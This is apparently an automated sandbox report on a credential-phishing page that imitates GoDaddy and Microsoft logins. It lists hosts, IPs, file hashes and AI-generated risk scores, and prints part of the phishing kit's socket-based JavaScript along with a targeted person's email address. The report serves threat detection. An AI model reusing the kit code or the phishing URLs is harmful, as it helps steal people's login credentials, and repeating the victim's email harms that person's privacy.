                          https://oknya83345.eleteriod.com/klTwjvYzK7ZnXdGU0MmXwR8cdFcuUR6piy8Hoa78168false
                          • Avira URL Cloud: safe
                          unknown
                          https://oknya83345.eleteriod.com/12BUrMGJQ5OOdz78ji9Tn5uQop50false
                          • Avira URL Cloud: safe
                          unknown
                          https://oknya83345.eleteriod.com/favicon.icofalse
                          • Avira URL Cloud: safe
                          unknown
                          https://oknya83345.eleteriod.com/qrRiGIunRIlmWDy4XNHkLCd9QMHuvoWva5jMdSjLAZIB0oQFclwOKeg98a9tc1j6cd240false
                          • Avira URL Cloud: safe
                          unknown
                          https://oknya83345.eleteriod.com/pq0hAI7qxScx87yzfXwx40false
                          • Avira URL Cloud: safe
                          unknown
                          https://oknya83345.eleteriod.com/ijyi2hjS5erxCGdTqsT8BtwI3rNaQaISKnbm7WopvWzN1oLZWZsUwUlQNCWPnDUtG3kZb3yz221false
                          • Avira URL Cloud: safe
                          unknown
                          https://oknya83345.eleteriod.com/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.jsfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/887dff9f6d8f429d/1716393414082/c0c2613fc26f1c8d1c5546c7cb6650be050f91d030f34066ed5eb405a0890187/hlziBgVNbWjZocRfalse
                          • Avira URL Cloud: safe
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://www.godaddy.com/legal/agreements/privacy-policy?target=_blankchromecache_110.2.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://developers.google.com/recaptcha/docs/faq#localhost_supportchromecache_140.2.drfalse
                          • URL Reputation: safe
                          unknown
                          https://sso.godaddy.com/v1/account/reset?app=o365&amp;realm=passchromecache_110.2.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://support.google.com/recaptcha#6262736chromecache_140.2.drfalse
                          • URL Reputation: safe
                          unknown
                          https://support.google.com/recaptcha/?hl=en#6223828chromecache_140.2.drfalse
                          • URL Reputation: safe
                          unknown
                          https://cloud.google.com/contactchromecache_140.2.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.godaddy.com/legal/agreements/cookie-policychromecache_110.2.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://support.google.com/recaptcha/#6175971chromecache_140.2.drfalse
                          • URL Reputation: safe
                          unknown
                          https://www.google.com/recaptcha/api2/chromecache_140.2.dr, chromecache_120.2.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://support.google.com/recaptchachromecache_140.2.drfalse
                          • URL Reputation: safe
                          unknown
                          https://cloud.google.com/recaptcha-enterprise/billing-informationchromecache_140.2.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://recaptcha.netchromecache_140.2.drfalse
                          • URL Reputation: safe
                          unknown
                          https://www.apache.org/licenses/chromecache_140.2.drfalse
                          • URL Reputation: safe
                          unknown
                          https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-quechromecache_140.2.drfalse
                          • URL Reputation: safe
                          unknown
                          https://www.gstatic.c..?/recaptcha/releases/joHA60MeME-PNviL59xVH9zs/recaptcha__.chromecache_140.2.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://play.google.com/log?format=json&hasfast=truechromecache_140.2.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.godaddy.com/chromecache_110.2.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-recachromecache_140.2.drfalse
                          • URL Reputation: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          18.245.31.89
                          d2vgu95hoyrpkh.cloudfront.netUnited States
                          16509AMAZON-02USfalse
                          216.58.206.36
                          www.google.comUnited States
                          15169GOOGLEUSfalse
                          104.17.3.184
                          challenges.cloudflare.comUnited States
                          13335CLOUDFLARENETUSfalse
                          216.58.206.68
                          unknownUnited States
                          15169GOOGLEUSfalse
                          239.255.255.250
                          unknownReserved
                          unknownunknownfalse
                          188.114.97.3
                          unknownEuropean Union
                          13335CLOUDFLARENETUSfalse
                          188.114.96.3
                          oknya83345.eleteriod.comEuropean Union
                          13335CLOUDFLARENETUStrue
                          151.101.66.137
                          code.jquery.comUnited States
                          54113FASTLYUSfalse
                          35.190.80.1
                          a.nel.cloudflare.comUnited States
                          15169GOOGLEUSfalse
                          104.17.2.184
                          unknownUnited States
                          13335CLOUDFLARENETUSfalse
                          IP
                          192.168.2.16
                          192.168.2.4
                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1445887
                          Start date and time:2024-05-22 17:55:55 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 3m 30s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:browseurl.jbs
                          Sample URL:https://oknya83345.eleteriod.com/infd201971/#YWhlaW5tYWFAY2lkZWwuY29t
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:13
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal68.phis.win@18/75@22/12
                          EGA Information:Failed
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, MoUsoCoreWorker.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 142.250.184.195, 108.177.15.84, 142.250.184.206, 34.104.35.123, 13.85.23.86, 20.3.187.198, 40.68.123.157, 20.242.39.171, 142.250.185.227, 216.58.212.170, 142.250.181.234, 142.250.185.106, 216.58.206.42, 142.250.186.42, 142.250.184.234, 142.250.74.202, 142.250.185.170, 142.250.186.74, 142.250.185.202, 142.250.185.74, 216.58.212.138, 216.58.206.74, 172.217.16.138, 142.250.185.138, 142.250.185.234, 93.184.221.240, 172.217.18.3
                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, clientservices.googleapis.com, ctldl.windowsupdate.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, glb.cws.prod.dcat.dsp.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, clients.l.google.com, www.gstatic.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                          • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtSetInformationFile calls found.
                          • VT rate limit hit for: https://oknya83345.eleteriod.com/infd201971/#YWhlaW5tYWFAY2lkZWwuY29t
                          No simulations
                          InputOutput
                          URL: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxs Model: gpt-4o
                          ```json
                          {
                            "riskscore": 6,
                            "reasons": "The code contains several suspicious elements: 1) It collects user agent information which can be used for fingerprinting. 2) It contains an email address that does not match the domain of the website name, which is a common phishing tactic. 3) It uses obfuscated variable names and values, which is often used to hide malicious intent. 4) It establishes a socket connection and queues data to be sent, which could be used to exfiltrate data. While these elements are not definitive proof of malicious intent, they are concerning and warrant further investigation."
                          }
                          var websitenames = ["godaddy"];
                          var capnum = 1;
                          var appnum = 1;
                          var view = "";
                          var pagelinkval = "tdx2r";
                          var emailcheck = "aheinmaa@cidel.com";
                          var webname = "rtrim(/web8/, '/')";
                          var urlo = "ro9EGsgt7WhYocqNMxT5aKqWBswapyeJg6XDk6Wh1EcHQ86i";
                          var gdf = "ghkJK9nH1FO45ArQ41dfips3ZhPmQuvehOQRWjZYQTgzSbRab115";
                          
                          var pagedata = "";
                          var portnum = "";
                          var namespaceSocket = "";
                          var redirecturl = "";
                          var browserconnected = 0;
                          var ReconnectListenerRegistered = 0;
                          var socketdisconnectedsend = 0;
                          var uid = "";
                          let socketqueue = [];
                          let socketqueuereq = [];
                          let userAgent = navigator.userAgent;
                          let browserName;
                          let userip;
                          let usercountry;
                          var errorcodeexecuted = false;
                          if(userAgent.match(/chrome|chromium|crios/i)){
                              browserName = "chrome";
                          } else if(userAgent.match(/firefox|fxios/i)){
                              browserName = "firefox";
                          } else if(userAgent.match(/safari/i)){
                              browserName = "safari";
                          } else if(userAgent.match(/opr\//i)){
                              browserName = "opera";
                          } else if(userAgent.match(/edg/i)){
                              browserName = "edge";
                          } else{
                              browserName="No browser detection";
                          }
                          const sendAndReceive = (route, args, getresponse) => {
                          if (!namespaceSocket.connected) {
                          socketdisconnectedsend = 1;
                          }
                          var socketentry = {
                              route: route,
                              responsesent: false,
                              responsereceived: false
                          };    
                          socketqueue.push(socketentry);
                          var data = {
                              route: route,
                              arguments: args,
                              getresponse: getresponse
                          };
                          socketqueuereq.push(data);
                          return new Promise((resolve, reject) => {
                          const emitRequest = () => {
                          namespaceSocket.emit('send_to_browser', data);
                          socketqueue[0].responsesent = true;
                          };
                          const emitRequestnew = () => {
                          namespaceSocket.emit('send_to_browser', socketqueuereq[socketqueuereq.length - 1]);
                          socketqueue[socketqueue.length - 1].responsesent = true;
                          };
                          const reconnectListener = () => {
                              namespaceSocket.on('user_reconnected', () => {
                              if ((!socketqueue[0].responsesent || socketqueue[0].responsesent && socketqueue[0].responsesent == false) || socketdisconnectedsend == 1) {
                                  console.log("connection connected after socket");
                                  if(socketdisconnectedsend == 1){
                                  emitRequestnew();
                                  }
                                  namespaceSocket.off('user_reconnected', reconnectListener);
                              } else if (socketqueue[0].responsesent == true && socketdisconnectedsend == 0) {
                                  console.log("connection connected after socket response send");
                                  namespaceSocket.emit('send_to_browser', {route: "getprevresponse",arguments: [],getresponse: 1});
                                  namespaceSocket.off('user_reconnected', reconnectListener);
                              }
                              });
                          };
                              const responseListener = (response) => {
                                  if(response.type && response.type == 'prevresponse'){
                                  console.log('prev response recieved');
                                  if(response.message == 'found prev response'){
                                  // socketqueue[0].responsereceived = true;
                                  namespaceSocket.emit('send_to_browser', {route: "responserecieved",arguments: [],getresponse: 0});
                                  ReconnectListenerRegistered = 3;
                                  socketdisconnectedsend = 0
                                  namespaceSocket.off
                          URL: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxs Model: gpt-4o
                          ```json
                          {
                            "phishing_score": 9,
                            "brands": "Microsoft",
                            "phishing": true,
                            "suspicious_domain": true,
                            "has_loginform": true,
                            "has_captcha": false,
                            "setechniques": true,
                            "reasons": "The URL 'https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxs' is highly suspicious as it does not match the legitimate domain for Microsoft, which is 'microsoft.com'. The use of a random subdomain and path is a common technique in phishing attacks. The page contains a login form, which is often targeted in phishing attempts. The overall appearance of the page mimics the legitimate Microsoft login page, indicating the use of social engineering techniques."
                          }
                          No context
                          No context
                          No context
                          No context
                          No context
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (1437), with CRLF line terminators
                          Category:downloaded
                          Size (bytes):38221
                          Entropy (8bit):5.115226983536052
                          Encrypted:false
                          SSDEEP:192:loogIexLQ5WKTCFBwCIZtJ8FtX2+UBRkfeWcrScuH9Ye3YdersR8Q5oqWjf7ogxp:2DKAaZtJs5odw7hx5P6mqjDggJkLLn
                          MD5:FBE2FCF4596B299453C91B7231BA7427
                          SHA1:743291EE60A551E043529AFDC9E3FBE72D70E776
                          SHA-256:2DE22B4CDEDCBEB9CD5F63EA7A0DF8F77D0EF9086D200B052BFA9EE949DEED40
                          SHA-512:15CA09CD5754927D77B2CC9B74356585C5A1DD934ECF25B613F47964236A739DA8BE389999DE1AEEE7BDF8FA12FCBB07EEFF49E0EA80BA87AC786606DE74774F
                          Malicious:false
                          Reputation:low
                          URL:https://oknya83345.eleteriod.com/xyHr8Q78qpqZef29
                          Preview:@font-face{font-family: 'gdsherpa';font-weight: 700;src: url('/web8/assets/fonts/GDSherpa-bold.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-bold.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 400;src: url('/web8/assets/fonts/GDSherpa-regular.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-regular.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 1 999;src: url('/web8/assets/fonts/GDSherpa-vf.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-vf.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 1 900;src: url('/web8/assets/fonts/GDSherpa-vf2.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-vf2.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gd-sage';font-weight: 700;src: url('/web8/ass
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:SVG Scalable Vector Graphics image
                          Category:downloaded
                          Size (bytes):7390
                          Entropy (8bit):4.02755241095864
                          Encrypted:false
                          SSDEEP:192:cdEMK4RwidEMK4Rwbwm6xiD7x9m9t6EQ3FabrItDWOO6DcA:cdEMVwidEMVwbwtxiDHmP6lFeItDWOOc
                          MD5:B59C16CA9BF156438A8A96D45E33DB64
                          SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                          SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                          SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                          Malicious:false
                          Reputation:low
                          URL:https://oknya83345.eleteriod.com/klTwjvYzK7ZnXdGU0MmXwR8cdFcuUR6piy8Hoa78168
                          Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
                          Category:dropped
                          Size (bytes):1400
                          Entropy (8bit):7.808470583085035
                          Encrypted:false
                          SSDEEP:24:rIcdIg4GFKiUqLRfqX5Cbg2tRSpGHM0RMrB6nzU9Jd28VVdYfWZG0rrZgqhpT:rHUZGRNEoSpGHMTrB6zUXdNVSi1b
                          MD5:333EE830E5AB72C41DD9126A27B4D878
                          SHA1:12D8D66EBB3076F3D6069E133C3212F97C8774E1
                          SHA-256:8702292CBC365E9F0488143E2B309B85EFE09C61FD2E0A2E21C53735A309313C
                          SHA-512:3413ED624241877C1D44FEE23FD37745CB214C12AE73FACFAFA07B47FA1CB9E5DAA3CB7F542564E04075FFE8BA744C962FBDD78F08A643A90C0EC1118C05BBF8
                          Malicious:false
                          Reputation:low
                          Preview:.PNG........IHDR...l................?IDAThC.X.n.A..K.. ..H8.....7P..p...&......>..4.'.y.`$Z...$1..9..;...w.|...zvvv.............b..Y....B...Dq..&\....pe..r.X.P...3.n...M.j.....+..r}}.t:...fa.mmm5U........)dwww...j...q<<<<L.}ggg.......k.O.?....^.gE.6....B..%U..w#H...y....~......h.....Q.E;.....T...E.W..X=..{.;..+.. ..`.(:2...A.*.U.....Y....z..l.r.S..<K...x.E.... .....U.,.`.....<::............MSiE.2w.!z.T...PWl.).0...Z....Z.'~.5zP.o..-. ......q..x..w.....y......5|v..i...........@w.c...j..3....w,/.3.).....u.......b.}..R........ `.*.....`mH$.U..B.H1...jx..3..$k ...........Z......4....A.>..X.a/...0N.&?q..........F#w&o."L:...l.c...x.P...@e..&.&|Y...!.i....gac..1C.....I..t...e~q.&.6.2B.}.*V.p.B.."...'..M..s.s.....V%-.?8yC.?m......z...&]\.VN.s....j.`....kY.....64.Y..(_ea[.r...1B.......5....i.u.......aQ.+z.x.......<,~..a...z,.I.T.b.P.^.`...y.58..,|Q...u.-.._....m.1...|k.j.7.,x.....X....ez..a....X...\E.$..-...s.../.9L.9*.(9..U...x$#.C...Nm...p.....J...
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:SVG Scalable Vector Graphics image
                          Category:dropped
                          Size (bytes):270
                          Entropy (8bit):4.840496990713235
                          Encrypted:false
                          SSDEEP:6:tI9mc4slzIzUQYqRRn3u0xboUSWuUX8+TQMRAvY:t4uzEu3u0xUUluUs+TQMRAQ
                          MD5:40EB39126300B56BF66C20EE75B54093
                          SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                          SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                          SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                          Malicious:false
                          Reputation:low
                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (23398), with no line terminators
                          Category:downloaded
                          Size (bytes):23398
                          Entropy (8bit):5.104409455331282
                          Encrypted:false
                          SSDEEP:384:ztafGtz2omXX44PL5Ky0sdY8xbXnb4YEb0tkBSgfn:hafSz2omXX44PL5Ky0sdY8xbXnEYw0sz
                          MD5:C1C51D30D5E7094136F2D828349E520F
                          SHA1:10AE8971AD7A8798BC9732707FE4896B57541557
                          SHA-256:0C55057782E3B346C2B819574BFA916852BC8AC5BB4E01D56E8FBFFC22043C98
                          SHA-512:7CF90E58A309B53DB53570129780E0ABCEFA2802C1A6441C1A4B49DC265DF617220DC1072CEBDAE7A74C3CA85F5D87B606503BD48A60E049372BE5CAF39969F7
                          Malicious:false
                          Reputation:low
                          URL:https://oknya83345.eleteriod.com/56rssvHl2yrWrn4cdsVelZ8918
                          Preview:*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit}*,input{margin:0}.p,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}.websitesections{height:100%;width:100vw;position:relative}#sections_godaddy,#sections_pdf{display:flex;flex-direction:column;height:100vh}#sections_pdf a{color:#fff;text-deco
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                          Category:downloaded
                          Size (bytes):43596
                          Entropy (8bit):7.9952701440723475
                          Encrypted:true
                          SSDEEP:768:b0nfc/3Osy1fo0tBBFF/GGXfN2ZHKTBUwL+BR49qCow3Z3HuvJ5+xXtTgXHk6/:b0fU3OdhFF/xNOoZc49ow3Z3HO+xX1mf
                          MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                          SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                          SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                          SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                          Malicious:false
                          Reputation:low
                          URL:https://oknya83345.eleteriod.com/899Gmt1GFtekU1wpUI5scdHVrq7eMazbjlab71
                          Preview:wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3*#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P*..j..)..'.L......b..RQjI*I..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P.....*.
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:Web Open Font Format, TrueType, length 36696, version 1.0
                          Category:downloaded
                          Size (bytes):36696
                          Entropy (8bit):7.988666025644622
                          Encrypted:false
                          SSDEEP:768:lvJo4KciQZYjebVq19lKPtHAQ/l4rj2bqkiHShpeSUOR4OqWOgaU:lhH3rVq1PKP432tSSh4SUORHqWcU
                          MD5:A69E9AB8AFDD7486EC0749C551051FF2
                          SHA1:C34E6AA327B536FB48D1FE03577A47C7EE2231B8
                          SHA-256:FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
                          SHA-512:9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
                          Malicious:false
                          Reputation:low
                          URL:https://oknya83345.eleteriod.com/23YPgTfaqT4mHAyzUabrdJNFlqxy69
                          Preview:wOFF.......X......6........0...(............DSIG...(............GPOS..........^>....GSUB.............3y.OS/2.......F...`h`{Zcmap...........<.?+.cvt .......0...<(...fpgm............?...gasp................glyf.."0..Tl...h...+head..v....4...6..}.hhea..v....!...$...Zhmtx..v........x;...loca..z|...........tmaxp..~$... ... .-..name..~D.......'....post............1+.,prep.............P..x..\.|U..Nr.^.......DD.T....V...C....U._.N..k.8.m...h.Q.6q....#....Y4l.}3.@ .............Z_....s.....>RD.....J....wR./...#.,<'f....4b..}(....P..\.s.9'.....-.Q..d..H.@%..K+....4U.4...yx.3..DkfJ..3S.H......|..........%.B...........W.~..nN<x.?....}jn...W..M.7...?...:-uAjQ.4J.].vm....H{&...y..@....G...~.......x=.V..g.;..@..J.l...G..L... g*M..h.....Q!}B...Q.m.M...R.5*.JUi*..U_5@]..PW...*5H.VW.k..:5D].nP#..5V=....x.....W/...E5I...NVS.T.u...^U3._...m5G-P...U...Gj.*V..j.Z...j..BJ.._Pw..0..f*...q...q5...'.F=MIj.7..^.f."..K\..pHMC.t.W.Z.Bz...l.+.....e|......B>....1.a,.D.Ej..(.
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (42526)
                          Category:downloaded
                          Size (bytes):42527
                          Entropy (8bit):5.373234803143812
                          Encrypted:false
                          SSDEEP:768:NCoLEBOnQowmmxCsbE95NdDid29P4DY88fvO959F1DQ+aohLyKoS4Hnla5KX5:qWQowHxCsQ919P0959vk
                          MD5:C667700BE084108F8DEDED9026FFBBF9
                          SHA1:31D633A11EF13A66787EC6504E38C11842664B7B
                          SHA-256:E158035A6F740B0245A027BF0D559C56782EBBEEC7CAB5A827083BD16AA47901
                          SHA-512:9EEA0C81A4D7E7ED7EE7F30A53B5AA93C356129D9850AE978A6D408F0B1337F3E9FCEDE25C996DCA3A2AC9840B86B4D821CD0A9DFFCF8BC427A730F420F33891
                          Malicious:false
                          Reputation:low
                          URL:https://challenges.cloudflare.com/turnstile/v0/b/695da7821231/api.js
                          Preview:"use strict";(function(){function Et(e,a,r,o,c,u,g){try{var b=e[u](g),_=b.value}catch(s){r(s);return}b.done?a(_):Promise.resolve(_).then(o,c)}function wt(e){return function(){var a=this,r=arguments;return new Promise(function(o,c){var u=e.apply(a,r);function g(_){Et(u,o,c,g,b,"next",_)}function b(_){Et(u,o,c,g,b,"throw",_)}g(void 0)})}}function M(e,a){return a!=null&&typeof Symbol!="undefined"&&a[Symbol.hasInstance]?!!a[Symbol.hasInstance](e):M(e,a)}function Re(e,a,r){return a in e?Object.defineProperty(e,a,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[a]=r,e}function Be(e){for(var a=1;a<arguments.length;a++){var r=arguments[a]!=null?arguments[a]:{},o=Object.keys(r);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(r).filter(function(c){return Object.getOwnPropertyDescriptor(r,c).enumerable}))),o.forEach(function(c){Re(e,c,r[c])})}return e}function dr(e,a){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (309), with CRLF line terminators
                          Category:downloaded
                          Size (bytes):51512
                          Entropy (8bit):4.892006093663147
                          Encrypted:false
                          SSDEEP:768:zb+2s/s39jm/I6G9o4Y66NPsyCVuitgRTHC4E/mMx4C8wDj:lvjm/I6GW4qsyCUMgRTHC4EeMx4+j
                          MD5:A4FB2E5112D3C26F9A65BE85C405C78E
                          SHA1:7D1EDE9F08674797F46DF412E0F3E4905320A65A
                          SHA-256:B8996AEB761C05089956C0E41873D3DFBC3ECED13D789240484EC174A6385A72
                          SHA-512:B389AA5657E929824B89EAB4B5F3E1F6E98D40B06F2E07F5A2B98D0328D5BBCF071CC73C34BC1A73EE9DBF3B436DA8088AB895A80A5212A86F894910A91EBCB6
                          Malicious:false
                          Reputation:low
                          URL:https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxs
                          Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>.. <script src="https://cdn.socket.io/4.6.0/socket.io.min.js"></script>.. <script src="https://www.google.com/recaptcha/api.js"></script>.. <link rel="stylesheet" href="/56rssvHl2yrWrn4cdsVelZ8918">.. <link rel="stylesheet" href="/xyHr8Q78qpqZef29">.. <link rel="preload" href="pq0hAI7qxScx87yzfXwx40" as="font" type="font/woff2" crossorigin="anonymous">.. <link rel="preload" href="12BUrMGJQ5OOdz78ji9Tn5uQop50" as="font" type="font/woff" crossorigin="anonymous">.. <link rel="preload" href="78kPf7VHCjo8RmwP45rSBdetCluv60" as="font" type="font/woff2" crossorigin="anonymous">.. <link rel="preload" href="23YPgTfaqT4mHAyzUabrdJNFlqxy69" as="font" type="font/woff" crossorigin="anonymous">.. <link rel="preload" href="899Gmt1GFtekU1wpUI5scdHVrq7eMazbjlab71" as="font" type="font/woff2" crossorigin="anonymous">.. <link rel="preload" href="efNetwmIjcotbWexf
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
